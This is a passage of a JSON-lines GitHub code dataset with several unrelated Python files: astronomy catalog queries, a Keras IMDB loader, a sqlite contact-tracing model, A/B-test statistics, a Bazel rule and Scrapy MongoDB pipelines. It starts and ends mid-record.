config.pluginmanager.get_plugin( 'capturemanager' )\n if capman._capturing.in_ is not None:\n capman._capturing.in_.done( )\n capman._capturing.in_ = None\n","repo_name":"BD2KGenomics/cgcloud","sub_path":"core/src/cgcloud/core/test/conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":858,"program_lang":"python","lang":"en","doc_type":"code","stars":22,"dataset":"github-code","pt":"53"} +{"seq_id":"36511968502","text":"\"\"\"\nQuerier class\n\n\"\"\"\n\nfrom astropy import units as u\nfrom astropy.coordinates import SkyCoord\nfrom astropy.io import ascii\nfrom astropy.table import Table\nfrom astroquery.gaia import Gaia\n\nimport numpy as np\nimport requests\n\nclass Querier:\n\n\t@staticmethod\n\tdef ps1_checklegal(table, release):\n\n\t\treleaselist = (\"dr1\", \"dr2\")\n\n\t\tif release not in (\"dr1\", \"dr2\"):\n\t\t\traise ValueError(\"Bad value for release (must be one of {})\".format(\", \".join(releaselist)))\n\n\t\tif release == \"dr1\":\n\t\t\ttablelist = (\"mean\", \"stack\")\n\t\telse:\n\t\t\ttablelist = (\"mean\", \"stack\", \"detection\")\n\n\t\tif table not in tablelist:\n\t\t\traise ValueError(\"Bad value for table (for {} must be one of {})\".format(release, \", \".join(tablelist)))\n\n\t@staticmethod\n\tdef ps1_cone(ra, dec, radius, table=\"mean\", release=\"dr2\", format=\"csv\", columns=None, baseurl=\"https://catalogs.mast.stsci.edu/api/v0.1/panstarrs\", verbose=False, **kw):\n\n\t\tdata = kw.copy()\n\t\tdata[\"ra\"] = ra\n\t\tdata[\"dec\"] = dec\n\t\tdata[\"radius\"] = radius\n\n\t\treturn Querier.ps1_search(table=table, release=release, format=format, columns=columns, baseurl=baseurl, verbose=verbose, **data)\n\n\t@staticmethod\n\tdef ps1_metadata(table=\"mean\", release=\"dr2\", baseurl=\"https://catalogs.mast.stsci.edu/api/v0.1/panstarrs\"):\n\n\t\tQuerier.ps1_checklegal(table, release)\n\n\t\turl = f\"{baseurl}/{release}/{table}/metadata\"\n\n\t\tr = requests.get(url)\n\t\tr.raise_for_status()\n\t\tv = r.json()\n\n\t\ttable = Table(rows=[(x[\"name\"], x[\"type\"], x[\"description\"]) for x in v], names=(\"name\", \"type\", \"description\"))\n\n\t\treturn table\n\n\t@staticmethod\n\tdef ps1_search(table=\"mean\", release=\"dr2\", format=\"csv\", columns=None, baseurl=\"https://catalogs.mast.stsci.edu/api/v0.1/panstarrs\", verbose=False, **kw):\n\n\t\tdata = kw.copy()\n\n\t\tif not data:\n\t\t\traise ValueError(\"You must specify some parameters for search\")\n\n\t\tQuerier.ps1_checklegal(table, release)\n\n\t\tif format not in (\"csv\", \"votable\", \"json\"):\n\t\t\traise ValueError(\"Bad value for format\")\n\n\t\turl = f\"{baseurl}/{release}/{table}.{format}\"\n\n\t\tif columns:\n\t\t\tdcols = {}\n\n\t\t\tfor col in Querier.ps1_metadata(table, release)[\"name\"]:\n\t\t\t\tdcols[col.lower()] = 1\n\n\t\t\tbadcols = []\n\t\t\tfor col in columns:\n\t\t\t\tif col.lower().strip() not in dcols:\n\t\t\t\t\tbadcols.append(col)\n\t\t\tif badcols:\n\t\t\t\traise ValueError(\"Some columns not found in table: {}\".format(\", \".join(badcols)))\n\n\t\t\tdata[\"columns\"] = \"[{}]\".format(\",\".join(columns))\n\n\t\tr = requests.get(url, params=data)\n\n\t\tif verbose:\n\t\t\tprint(r.url)\n\n\t\tr.raise_for_status()\n\n\t\tif format == \"json\":\n\t\t\treturn r.json()\n\t\telse:\n\t\t\treturn r.text\n\n\t@staticmethod\n\tdef query_gaia_cone(ra, dec, radius):\n\n\t\tpprint(\"Submitting Gaia cone search\")\n\t\tGaia.MAIN_GAIA_TABLE = \"gaiadr2.gaia_source\"\n\t\tGaia.ROW_LIMIT = -1\n\n\t\tra = str(ra)\n\t\tdec = str(dec)\n\n\t\tsearch_coord = SkyCoord(ra, dec, unit=(u.deg, u.deg), frame=\"fk5\")\n\t\tsearch_radius = u.Quantity(radius, u.deg)\n\t\tsearch = Gaia.cone_search_async(search_coord, search_radius)\n\n\t\ttable = search.get_results()\n\n\t\treturn table\n\n\t@staticmethod\n\tdef query_gaia_square(ra, dec, side):\n\n\t\tprint(\"Submitting Gaia square search\")\n\t\tGaia.MAIN_GAIA_TABLE = \"gaiadr2.gaia_source\"\n\t\tGaia.ROW_LIMIT = -1\n\n\t\tra = str(ra)\n\t\tdec = str(dec)\n\t\tside = float(side)\n\n\t\tsearch_coord = SkyCoord(ra, dec, unit=(u.deg, u.deg), frame=\"fk5\")\n\t\tsearch_width = u.Quantity(side, u.deg)\n\t\tsearch_height = u.Quantity(side, u.deg)\n\n\t\ttable = Gaia.query_object_async(search_coord, width=search_width, height=search_height)\n\n\t\treturn table\n\n\t@staticmethod\n\tdef query_ps1_cone(ra, dec, radius):\n\n\t\tprint(\"Submitting PS1 cone search\")\n\t\trelease = \"dr2\"\n\t\tconstraints = {\"nDetections.gt\":1}\n\n\t\tra = float(ra)\n\t\tdec = float(dec)\n\t\tradius = float(radius)\n\n\t\tcolumns = \"\"\"objID, raMean, decMean, nDetections, ng, nr, ni, nz, ny, gMeanPSFMag, rMeanPSFMag, iMeanPSFMag, zMeanPSFMag, yMeanPSFMag\"\"\".split(\",\")\n\t\tcolumns = [x.strip() for x in columns]\n\t\tcolumns = [x for x in columns if x and not x.startswith(\"#\")]\n\n\t\tresults = Querier.ps1_cone(ra, dec, radius, release=release, columns=columns, **constraints)\n\n\t\ttable = ascii.read(results)\n\n\t\tfor filter in \"grizy\":\n\t\t\tcol = filter + \"MeanPSFMag\"\n\t\t\ttry:\n\t\t\t\ttable[col].format = \".4f\"\n\t\t\t\ttable[col][table[col] == -999.0] = np.nan\n\t\t\texcept KeyError:\n\t\t\t\tprint(\"{} not found\".format(col))\t\n\n\t\treturn table","repo_name":"rcamuccio/Hades","sub_path":"lib/querier.py","file_name":"querier.py","file_ext":"py","file_size_in_byte":4237,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"37034947606","text":"from keras.datasets import imdb\nimport numpy as np\n\nold = np.load\nnp.load = lambda *a,**k: old(*a,**k,allow_pickle=True)\n(x_train, y_train), (x_test, y_test) = imdb.load_data(num_words=6000)\nnp.load = old\ndel(old)\n\nprint(x_train[0])\nprint(y_train[0])\n\nwind = imdb.get_word_index()\nwind['kagan']\nrevind = dict((v, k) for k, v in wind.items())\n\ndef decode(sent_list):\n new_words = []\n for i in sent_list:\n new_words.append(revind.get(i-3, '*'))\n comb_words = ' '.join(new_words)\n return comb_words\n\ndecode(x_train[0])\n","repo_name":"seungukson/NLP_lab","sub_path":"190724_p291.IMDB(data).py","file_name":"190724_p291.IMDB(data).py","file_ext":"py","file_size_in_byte":535,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} +{"seq_id":"20538770089","text":"import sqlite3\nimport os\nfrom datetime import datetime\n\n# Connecting python program to database\npathname = __file__\npathname = pathname[:-8]\n\nconn = sqlite3.connect(\n pathname + 'cov.db')\nc = conn.cursor()\n\n\nclass Person(object):\n\n def __init__(self, dateTime, id, last_name, first_name, address, contact_number, last_location):\n self.id = id\n self.dateTime = dateTime\n self.last_name = last_name\n self.first_name = first_name\n self.address = address\n self.contact_number = contact_number\n self.last_location = last_location\n\n insert_db(self.id, self.dateTime, self.last_name, self.first_name,\n self.address, self.contact_number, self.last_location)\n\n#Add ka dito ng function na kukuha ng data from database tapos icchart gamit matplot lib tapos route mo siya papunta sa view file\n#then yung view file yung mag format kung anong itsura ng chart na trip mo palabasin then add ka ng option sa controller para sa user if gusto niya makita charts\n\ndef get_all():\n c.execute(\"SELECT * FROM cov_tracker \")\n fetched_list = c.fetchall()\n conn.commit()\n\n return fetched_list\n\n\ndef create_person():\n Person(str(datetime.now()),input(\"Enter ID: \"), input(\"Enter Last name: \"), input(\"Enter First name: \"), input(\n \"Enter Address: \"), input(\"Enter Contact number: \"), input(\"Enter Last location: \"))\n\n\ndef insert_db(id, dateTime, last_name, first_name, address, contact_number, last_location):\n c.execute(\"INSERT INTO cov_tracker VALUES (:id, :datetime, :lastn, :firstn, :address, :cn, :lastloc )\", {\n 'id': id, 'datetime' :dateTime, 'lastn': last_name, 'firstn': first_name, 'address': address, 'cn': contact_number, 'lastloc': last_location})\n conn.commit()\n\n\n\ndef search_db(id):\n c.execute(\"SELECT * FROM cov_tracker WHERE ID = :id\", {'id': id})\n fetched_list = c.fetchall()\n conn.commit()\n\n return fetched_list\n\n\ndef search_db_bykeyword(keyword):\n c.execute(\"SELECT * FROM cov_tracker WHERE FIRST_NAME LIKE ?\",\n ('%'+keyword+'%',))\n fetched_list = c.fetchall()\n conn.commit()\n\n return fetched_list\n\ndef del_entry(id):\n c.execute(\"DELETE FROM cov_tracker WHERE ID = :id\", {'id': id})\n conn.commit()\n\n\ndef close_connection():\n conn.close()\n","repo_name":"MauiAus/SampleRepo","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":2298,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"16946207770","text":"import collections\nimport math\nimport sys\n\nfrom scipy import stats\n\nif sys.version_info >= (3,):\n xrange = range\n\ndef get_z_critical_value(alpha, two_tailed=True):\n \"\"\"\n Returns the z critical value for a particular alpha = 1 - confidence level. By default returns\n a two-tailed z-value, meaning the actual tail probability is alpha / 2.\n \"\"\"\n if two_tailed:\n alpha /= 2\n return stats.distributions.norm.ppf(1 - alpha)\n\n# a value with confidence interval bounds (not necessarily centered around the point estimate)\nValueWithInterval = collections.namedtuple(\n 'ValueWithInterval',\n ('value', 'lower_bound', 'upper_bound'),\n)\n\nclass ValueWithError(object):\n \"\"\"\n A value with standard error, from which a confidence interval can be derived.\n \"\"\"\n def __init__(self, value, error):\n self.value = value\n self.error = error\n\n def confidence_interval_width(self, z_critical_value):\n \"\"\"\n z_critical_value should be the value at which the right-tail probability for a standard\n normal distribution equals half the desired alpha = 1 - confidence level:\n\n P(Z > z_value) = 1 - alpha / 2\n\n where Z is an N(0, 1) random variable. Use get_z_critical_value(), or see\n http://en.wikipedia.org/wiki/Standard_normal_table.\n \"\"\"\n return z_critical_value * self.error\n\n def value_with_interval(self, z_critical_value, estimated_value=None):\n width = self.confidence_interval_width(z_critical_value)\n return ValueWithInterval(\n value=estimated_value if estimated_value is not None else self.value,\n lower_bound=self.value - width,\n upper_bound=self.value + width,\n )\n\nclass BinomialDistribution(object):\n def __init__(self, num_trials, probability):\n self.num_trials = num_trials\n self.probability = probability\n self.expectation = num_trials * probability\n self.standard_deviation = math.sqrt(self.expectation * (1 - probability))\n self._binomial = stats.binom(num_trials, probability)\n\n def mass(self, count):\n return self._binomial.pmf(count)\n\n def cdf(self, count):\n return self._binomial.cdf(count)\n\n def survival(self, count):\n return 1 - self.cdf(count)\n\n def inverse_cdf(self, probability):\n return self._binomial.ppf(probability)\n\n def inverse_survival(self, probability):\n return self._binomial.isf(probability)\n\nclass Proportion(object):\n def __init__(self, num_successes, num_trials):\n \"\"\"\n Represents a binomial proportion with num_successes successful samples out of num_trials\n total.\n \"\"\"\n self.num_successes = num_successes\n self.num_trials = num_trials\n\n def p_estimate(self, z_critical_value=0):\n \"\"\"\n Generate an adjusted estimate and error using the \"Agresti-Coull Interval\", see\n http://en.wikipedia.org/wiki/Binomial_proportion_confidence_interval#Agresti-Coull_Interval.\n\n The estimated value is an adjusted best estimate for the actual probability. For example, if\n 0 successes were observed out of 10 samples, it's unlikely the actual probability is zero,\n so the adjusted estimate will be slightly above zero.\n\n A z_critical_value of zero yields the ordinary Wald interval.\n \"\"\"\n adjusted_num_trials = float(self.num_trials + z_critical_value**2)\n interval_center = (self.num_successes + z_critical_value**2 / 2) / adjusted_num_trials\n standard_error = math.sqrt(interval_center * (1 - interval_center) / adjusted_num_trials)\n return ValueWithError(interval_center, standard_error)\n\n def mixed_estimate(self, z_critical_value):\n \"\"\"\n Returns an ValueWithInterval with a MLE value and upper/lower bounds from the Agresti-Coull\n interval.\n \"\"\"\n return (\n self.p_estimate(z_critical_value=z_critical_value)\n .value_with_interval(z_critical_value, estimated_value=self.p_estimate().value)\n )\n\ndef confidence_interval_on_proportion(num_successes, num_trials, confidence_level=0.95):\n '''Convenience function with more straightforward interface.'''\n return Proportion(num_successes, num_trials).mixed_estimate(\n get_z_critical_value(1 - confidence_level)\n )\n\nclass ProportionComparison(object):\n def __init__(self, baseline, variation):\n self.baseline = baseline\n self.variation = variation\n\n def difference_estimate(self, z_critical_value):\n \"\"\"\n Generate an estimate of the difference in success rates between the variation and the\n baseline.\n \"\"\"\n baseline_p = self.baseline.p_estimate(z_critical_value=z_critical_value)\n variation_p = self.variation.p_estimate(z_critical_value=z_critical_value)\n difference = variation_p.value - baseline_p.value\n standard_error = math.sqrt(baseline_p.error ** 2 + variation_p.error ** 2)\n return ValueWithError(difference, standard_error)\n\n def difference_ratio(self, z_critical_value):\n \"\"\"\n Return the difference in sucess rates as a proportion of the baseline success rate.\n \"\"\"\n baseline_value = self.baseline.p_estimate(z_critical_value=z_critical_value).value\n difference = self.difference_estimate(z_critical_value=z_critical_value)\n ratio = difference.value / baseline_value\n error = difference.error / baseline_value\n return ValueWithError(ratio, error)\n\n def z_test(self, z_multiplier=1):\n \"\"\"\n Perform a large-sample z-test of null hypothesis H0: p_baseline == p_variation against\n alternative hypothesis H1: p_baseline < p_variation. Return the (one-tailed) p-value.\n\n z_multiplier: test z-value will be multiplied by this factor before computing a p-value.\n\n See http://en.wikipedia.org/wiki/Statistical_hypothesis_testing#Common_test_statistics,\n \"Two-proportion z-test, pooled for d0 = 0\".\n \"\"\"\n pooled_stats = Proportion(\n self.baseline.num_successes + self.variation.num_successes,\n self.baseline.num_trials + self.variation.num_trials,\n )\n pooled_p_value = pooled_stats.p_estimate().value\n pooled_variance_of_difference = (\n pooled_p_value * (1 - pooled_p_value)\n * (1.0 / self.baseline.num_trials + 1.0 / self.variation.num_trials)\n )\n pooled_standard_error_of_difference = math.sqrt(pooled_variance_of_difference)\n test_z_value = self.difference_estimate(0).value / pooled_standard_error_of_difference\n adjusted_p_value = stats.distributions.norm.sf(test_z_value * z_multiplier)\n return adjusted_p_value\n\n def _binomial_coverage_interval(self, distribution, coverage_alpha):\n \"\"\"\n For the given binomial distribution, compute an interval that covers at least (1 -\n coverage_alpha) of the total probability mass, centered at the expectation (unless we're at\n the boundary). Uses the normal approximation.\n \"\"\"\n if distribution.num_trials < 1000:\n # don't even bother trying to optimize for small-ish sample sizes\n return (0, distribution.num_trials)\n else:\n return (\n int(math.floor(distribution.inverse_cdf(coverage_alpha / 2))),\n int(math.ceil(distribution.inverse_survival(coverage_alpha / 2))),\n )\n\n def _probability_union(self, probability, num_tests):\n \"\"\"\n Given the probability of an event, compute the probability that it happens at least once in\n num_tests independent tests. This is used to adjust a p-value for multiple comparisons.\n When used to adjust alpha instead, this is called a Sidak correction (the logic is the same,\n the formula is inverted):\n http://en.wikipedia.org/wiki/Bonferroni_correction#.C5.A0id.C3.A1k_correction\n \"\"\"\n return 1 - (1 - probability)**num_tests\n\n def iterated_test(self, num_tests, coverage_alpha, improvement_only=False):\n \"\"\"\n Compute a p-value testing null hypothesis H0: p_baseline == p_variation against alternative\n hypothesis H1: p_baseline != p_variation by summing p-values conditioned on individual\n baseline success counts. This provides a more accurate correction for multiple testing but\n scales like O(sqrt(self.baseline.num_trials)), so can eventually get slow for very large\n values.\n\n Lower coverage_alpha increases accuracy at the cost of longer runtime. Roughly, the result\n will be accurate within no more than coverage_alpha (but this ignores error due to the\n normal approximation so isn't guaranteed).\n\n If improvement_only=True, computes p-value for alternative hypothesis\n H1: p_baseline < p_variation instead.\n \"\"\"\n observed_delta = self.variation.p_estimate().value - self.baseline.p_estimate().value\n if observed_delta == 0 and not improvement_only:\n # a trivial case that the code below does not handle well\n return 1\n\n pooled_proportion = (\n (self.baseline.num_successes + self.variation.num_successes)\n / float(self.baseline.num_trials + self.variation.num_trials)\n )\n variation_distribution = BinomialDistribution(self.variation.num_trials, pooled_proportion)\n baseline_distribution = BinomialDistribution(self.baseline.num_trials, pooled_proportion)\n\n baseline_limits = self._binomial_coverage_interval(baseline_distribution, coverage_alpha)\n p_value = 0\n for baseline_successes in xrange(baseline_limits[0], baseline_limits[1] + 1):\n baseline_proportion = 1.0 * baseline_successes / self.baseline.num_trials\n if improvement_only:\n lower_trial_count = -1\n upper_trial_count = math.ceil(\n (baseline_proportion + observed_delta) * self.variation.num_trials\n )\n else:\n observed_absolute_delta = abs(observed_delta)\n lower_trial_count = math.floor(\n (baseline_proportion - observed_absolute_delta) * self.variation.num_trials\n )\n upper_trial_count = math.ceil(\n (baseline_proportion + observed_absolute_delta) * self.variation.num_trials\n )\n\n # p-value of variation success counts \"at least as extreme\" for this particular\n # baseline success count\n p_value_at_baseline = (\n variation_distribution.cdf(lower_trial_count)\n + variation_distribution.survival(upper_trial_count - 1)\n )\n\n # this is exact because we're conditioning on the baseline count, so the multiple\n # tests are independent.\n adjusted_p_value = self._probability_union(p_value_at_baseline, num_tests)\n\n baseline_probability = baseline_distribution.mass(baseline_successes)\n p_value += baseline_probability * adjusted_p_value\n\n # the remaining baseline values we didn't cover contribute less than coverage_alpha to the\n # sum, so adding that amount gives us a conservative upper bound.\n return p_value + coverage_alpha\n\nResults = collections.namedtuple(\n 'Results',\n (\n 'num_successes',\n 'num_trials',\n 'proportion', # ValueWithInterval\n 'improvement', # ValueWithInterval\n 'relative_improvement', # ValueWithInterval\n 'two_tailed_p_value', # two-tailed p-value for trial != baseline\n 'improvement_one_tailed_p_value', # one-tailed p-value for trial > baseline\n ),\n)\n\nclass Experiment(object):\n P_VALUE_PRECISION = 1e-5\n\n def __init__(self, num_trials, baseline_num_successes, baseline_num_trials,\n confidence_level=0.95):\n \"\"\"\n num_trials: number of trials to be compared to the baseline\n confidence_level: used for all confidence intervals generated\n \"\"\"\n self.num_comparisons = max(1, num_trials)\n self._baseline = Proportion(baseline_num_successes, baseline_num_trials)\n alpha = (1 - confidence_level) / num_trials # Bonferroni correction\n self._z_critical_value = get_z_critical_value(alpha)\n\n def get_baseline_proportion(self):\n return self._baseline.mixed_estimate(self._z_critical_value)\n\n def get_results(self, num_successes, num_trials):\n trial = Proportion(num_successes, num_trials)\n comparison = ProportionComparison(self._baseline, trial)\n return Results(\n num_successes=num_successes,\n num_trials=num_trials,\n proportion=trial.mixed_estimate(self._z_critical_value),\n improvement=comparison.difference_estimate(self._z_critical_value)\n .value_with_interval(\n self._z_critical_value,\n estimated_value=comparison.difference_estimate(0).value,\n ),\n relative_improvement=comparison.difference_ratio(self._z_critical_value)\n .value_with_interval(\n self._z_critical_value,\n estimated_value=comparison.difference_ratio(0).value,\n ),\n two_tailed_p_value=comparison.iterated_test(\n self.num_comparisons,\n self.P_VALUE_PRECISION,\n ),\n improvement_one_tailed_p_value=comparison.iterated_test(\n self.num_comparisons,\n self.P_VALUE_PRECISION,\n improvement_only=True,\n ),\n )\n","repo_name":"thumbtack/abba","sub_path":"python/abba/stats.py","file_name":"stats.py","file_ext":"py","file_size_in_byte":13687,"program_lang":"python","lang":"en","doc_type":"code","stars":245,"dataset":"github-code","pt":"53"} +{"seq_id":"7956693101","text":"# -*- python -*-\n\nload(\"@drake//tools/workspace:github.bzl\", \"github_archive\")\n\n# Note that we do NOT install a LICENSE file as part of the Drake install\n# because this repository is required only when building and testing with\n# Bazel.\n\ndef rules_python_repository(\n name,\n mirrors = None):\n github_archive(\n name = name,\n repository = \"bazelbuild/rules_python\", # License: Apache-2.0\n commit = \"38f86fb55b698c51e8510c807489c9f4e047480e\",\n sha256 = \"c911dc70f62f507f3a361cbc21d6e0d502b91254382255309bc60b7a0f48de28\", # noqa\n mirrors = mirrors,\n )\n","repo_name":"julesser/drake","sub_path":"tools/workspace/rules_python/repository.bzl","file_name":"repository.bzl","file_ext":"bzl","file_size_in_byte":605,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"38712625287","text":"# -*- coding: utf-8 -*-\n\n# Define your item pipelines here\n#\n# Don't forget to add your pipeline to the ITEM_PIPELINES setting\n# See: https://docs.scrapy.org/en/latest/topics/item-pipeline.html\nimport csv\nimport time\n\nimport redis\nfrom pymongo import MongoClient\nfrom scrapy.utils.project import get_project_settings\n\n\nclass AnchorspiderPipeline(object):\n def process_item(self, item, spider):\n return item\n\n\nclass CsvPipeline(object):\n def __init__(self):\n self.f = open(\"anchor_data.csv\", \"a+\", encoding='utf-8', newline='')\n self.writer = csv.writer(self.f)\n self.writer.writerow(['userId', 'nick', 'fansCount'])\n\n def process_item(self, item, spider):\n goods = [item['userId'], item['nick'], item['fansCount']]\n\n self.writer.writerow(goods)\n return item\n\n def close_spider(self, spider): # 关闭\n self.f.close()\n\n\nclass AnchorMongoDBPipeline(object):\n collection = 'anchor_data'\n def __init__(self,mongo_uri,mongo_db,collection_dict):\n self.mongo_uri = mongo_uri\n self.mongo_db = mongo_db\n self.collection_dict = collection_dict\n self.time_str = time.strftime(\"%Y-%m-%d\", time.localtime())\n\n @classmethod\n def from_crawler(cls, crawler):\n '''\n scrapy为我们访问settings提供了这样的一个方法,这里,\n 我们需要从settings.py文件中,取得数据库的URI和数据库名称\n '''\n return cls(\n mongo_uri=crawler.settings.get('MONGO_URI'),\n mongo_db=crawler.settings.get('MONGO_DB'),\n collection_dict = crawler.settings.get('COLLECTION')\n )\n\n def open_spider(self,spider):\n self.client = MongoClient(self.mongo_uri)\n self.db = self.client[self.mongo_db]\n\n def close_spider(self,spider):\n self.client.close()\n\n def process_item(self,item,spider):\n data = {\n \"userId\": item['userId'],\n \"nick\": item['nick'],\n 'fansCount': item['fansCount'],\n\n }\n table = self.db[self.collection]\n table.insert_one(data)\n return item\n\nclass AnchorDataMongoDBPipeline(object):\n # collection = 'YunzkData(ku.iyunzk.com)'\n def __init__(self, mongo_uri, mongo_db, collection_dict, catId):\n self.catId = catId\n self.mongo_uri = mongo_uri\n self.mongo_db = mongo_db\n self.collection_dict = collection_dict\n self.time_str = time.strftime(\"%Y-%m-%d\", time.localtime())\n self.setting = get_project_settings()\n self.r = redis.StrictRedis(host=self.setting.get('REDIS_IP'), port=self.setting.get('REDIS_PORT'), db=0,\n password=self.setting.get('REDIS_PASSWORD'))\n\n @classmethod\n def from_crawler(cls, crawler):\n '''\n scrapy为我们访问settings提供了这样的一个方法,这里,\n 我们需要从settings.py文件中,取得数据库的URI和数据库名称\n '''\n return cls(\n mongo_uri=crawler.settings.get('MONGO_URI'),\n mongo_db=crawler.settings.get('MONGO_DB'),\n collection_dict=crawler.settings.get('COLLECTION'),\n catId = crawler.settings.get('Category')\n )\n\n def open_spider(self, spider):\n print(spider.name)\n self.client = MongoClient(self.mongo_uri)\n self.db = self.client[self.mongo_db]\n self.collection = self.db[self.collection_dict[spider.name]]\n\n def close_spider(self, spider):\n self.client.close()\n\n def process_item(self, item, spider):\n if spider.name == 'tb_anchor_goods':\n self.process_anchor_goods(item)\n elif spider.name == 'tb_anchor':\n self.process_anchor(item)\n elif spider.name == 'tb_anchorid':\n self.process_anchorid(item)\n elif spider.name == 'dev_tb_anchor':\n self.process_dev_anchor(item)\n elif spider.name == 'tb_anchor_goods_task':\n self.process_tb_anchor_goods_task(item)\n\n def process_anchor_goods(self, item):\n res = self.collection.find_one({\"anchorId\": item.get('accountId'), 'createTime':item.get('createTime'), \"itemId\": item.get('itemId')})\n if not res:\n categoryid = self.catId.get(item.get('categoryId'))\n if not categoryid:\n categoryid = self.catId.get(item.get('rootCategoryId'))\n\n if not categoryid:\n categoryid = None\n data = {\n 'anchorId': item.get('accountId'),\n 'anchorName': item.get('accountName'),\n 'title': item.get('title'),\n 'createTime': item.get('createTime'),\n 'itemId': item.get('itemId'),\n 'sellerId': item.get('sellerId'),\n 'goods_url': item.get('goods_url'),\n 'shopName': item.get('shopName'),\n 'liveId': item.get('liveId'),\n 'liveURL': item.get('liveURL'),\n 'livePrice': item.get('livePrice'),\n 'categoryId': item.get('categoryId'),\n 'class2name': item.get('class2name'),\n 'shopId': item.get('shopId'),\n 'shopType': item.get('shopType'),\n 'maintype': item.get('maintype'),\n 'rootCategoryId': item.get('rootCategoryId'),\n \"Monthly_payment\": None,\n \"CommtentCount\": None,\n 'is_dispose': 1,\n 'plcategory': categoryid\n }\n\n self.collection.insert_one(data)\n self.r.sadd('ALL_liveId:ItemId', '{}:{}'.format(item.get('liveId'), item.get('itemId')))\n return item\n\n def process_anchor(self, item):\n res = self.collection.find_one({\"accountId\": item.get('accountId')})\n try:\n fanscount = int(item.get('fansCount'))\n except:\n fanscount = None\n\n if not res:\n data = {\n \"accountId\": item['accountId'],\n \"accountName\": item['accountName'],\n 'fansNum': fanscount,\n 'headImg_url': item['headImg_url'],\n \"alliveId\": int(item['alliveId']),\n \"allpv\": int(item['allpv']),\n 'alluv': int(item['alluv']),\n 'countitemId': int(item['countitemId']),\n \"countshopId\": int(item['countshopId']),\n \"evepv\": int(item['evepv']),\n 'eveuv': int(item['eveuv']),\n 'liveId': item['liveId'],\n 'evetaobaoclass2scale': item['evetaobaoclass2scale'],\n 'create_time': time.strftime(\"%Y-%m-%d\", time.localtime())\n }\n self.collection.insert_one(data)\n else:\n if res.get('fansNum') == fanscount and res.get('headImg_url') == item.get('headImg_url') and res.get(\n 'alliveId') == item.get('alliveId') and res.get('allpv') == item.get('allpv') and res.get(\n 'alluv') == item.get('alluv') and res.get('countitemId') == item.get('countitemId') and res.get(\n 'countshopId') == item.get('countshopId') and res.get('evepv') == item.get('evepv') and res.get(\n 'eveuv') == item.get('eveuv') and res.get('liveId') == item.get('liveId') and res.get(\n 'evetaobaoclass2scale') == item.get('evetaobaoclass2scale'):\n pass\n else:\n self.collection.update_one({'anchorId': str(id)},\n {'$set':\n {\n 'fansNum': fanscount,\n 'headImg_url': item['headImg_url'],\n \"alliveId\": int(item['alliveId']),\n \"allpv\": int(item['allpv']),\n 'alluv': int(item['alluv']),\n 'countitemId': int(item['countitemId']),\n \"countshopId\": int(item['countshopId']),\n \"evepv\": int(item['evepv']),\n 'eveuv': int(item['eveuv']),\n 'liveId': item['liveId'],\n 'evetaobaoclass2scale': item['evetaobaoclass2scale'],\n }\n }\n ) # 更新已存在的主播数据\n return item\n\n def process_dev_anchor(self, item):\n res = self.collection.find_one({\"anchorId\": item.get('accountId')})\n try:\n fanscount = int(item.get('fansCount'))\n except:\n fanscount = None\n\n if not res:\n data = {\n\n 'anchorId': str(item.get('anchorId')),\n 'anchorName': item.get('anchorName'),\n 'houseId': None,\n 'fansCount': fanscount,\n 'liveCount': None,\n 'city': None,\n 'creatorType': None,\n 'darenScore': None,\n 'descText': None,\n 'anchorPhoto': item['anchorPhoto'],\n 'organId': None,\n 'fansFeature': None,\n 'historyData': None,\n }\n self.collection.insert_one(data) # 插入一条不存在的主播数据\n return item\n\n def process_anchorid(self, item):\n res = self.collection.find_one({\"anchorId\": item.get('anchorId')})\n if not res:\n data = {\n \"anchorId\": item['anchorId'],\n \"anchorName\": item['anchorName'],\n 'anchorPicture': item['anchorPicture'],\n 'endLiveTime': item['endLiveTime'],\n \"goodsIndex\": item['goodsIndex'],\n \"itemId\": item['itemId'],\n 'startLiveTime': item['startLiveTime'],\n 'topic': item['topic'],\n }\n self.collection.insert_one(data)\n return item\n\n def process_tb_anchor_goods_task(self, item):\n res = self.collection.find_one(\n {\"anchorId\": item.get('accountId'), 'createTime': item.get('createTime'), \"itemId\": item.get('itemId')})\n if not res:\n\n categoryid = self.catId.get(item.get('categoryId'))\n if not categoryid:\n categoryid = self.catId.get(item.get('rootCategoryId'))\n\n if not categoryid:\n categoryid = None\n\n data = {\n 'anchorId': item.get('accountId'),\n 'anchorName': item.get('accountName'),\n 'title': item.get('title'),\n 'createTime': item.get('createTime'),\n 'itemId': item.get('itemId'),\n 'sellerId': item.get('sellerId'),\n 'goods_url': item.get('goods_url'),\n 'shopName': item.get('shopName'),\n 'liveId': item.get('liveId'),\n 'liveURL': item.get('liveURL'),\n 'livePrice': item.get('livePrice'),\n 'categoryId': item.get('categoryId'),\n 'class2name': item.get('class2name'),\n 'shopId': item.get('shopId'),\n 'shopType': item.get('shopType'),\n 'maintype': item.get('maintype'),\n 'rootCategoryId': item.get('rootCategoryId'),\n \"Monthly_payment\": None,\n \"CommtentCount\": None,\n 'is_dispose': 1,\n 'plcategory': categoryid\n }\n\n self.collection.insert_one(data)\n self.r.sadd('liveId:ItemId', '{}:{}'.format(item.get('liveId'), item.get('itemId')))\n return item\n\n\n","repo_name":"1987128073/project","sub_path":"pinyou/AnchorSpider/AnchorSpider/pipelines.py","file_name":"pipelines.py","file_ext":"py","file_size_in_byte":11920,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"42142894452","text":"import sys\n\nimport vdif_utils\n\nargs = sys.argv\nprogram = args.pop(0)\nlimit = int(args.pop(0))\n\nfor f in args:\n df = vdif_utils.index(f, limit=limit, only_seconds=True, verbose=True)\n\n print(df)\n print(df.dtypes)\n","repo_name":"Smithsonian/cloud-corr-mri","sub_path":"vdif_utils/index.py","file_name":"index.py","file_ext":"py","file_size_in_byte":221,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"40810564245","text":"import pytest\n\nfrom photo_emailer.logic.credentials import Credentials\nfrom photo_emailer.infrastructure.credentials_refresher import (\n CredentialsRefresher,\n RefreshError,\n)\n\n\ndef test_credentials_refresher_can_refresh_credentials_if_expired():\n creds = Credentials.get_test_instance()\n creds.expiry = 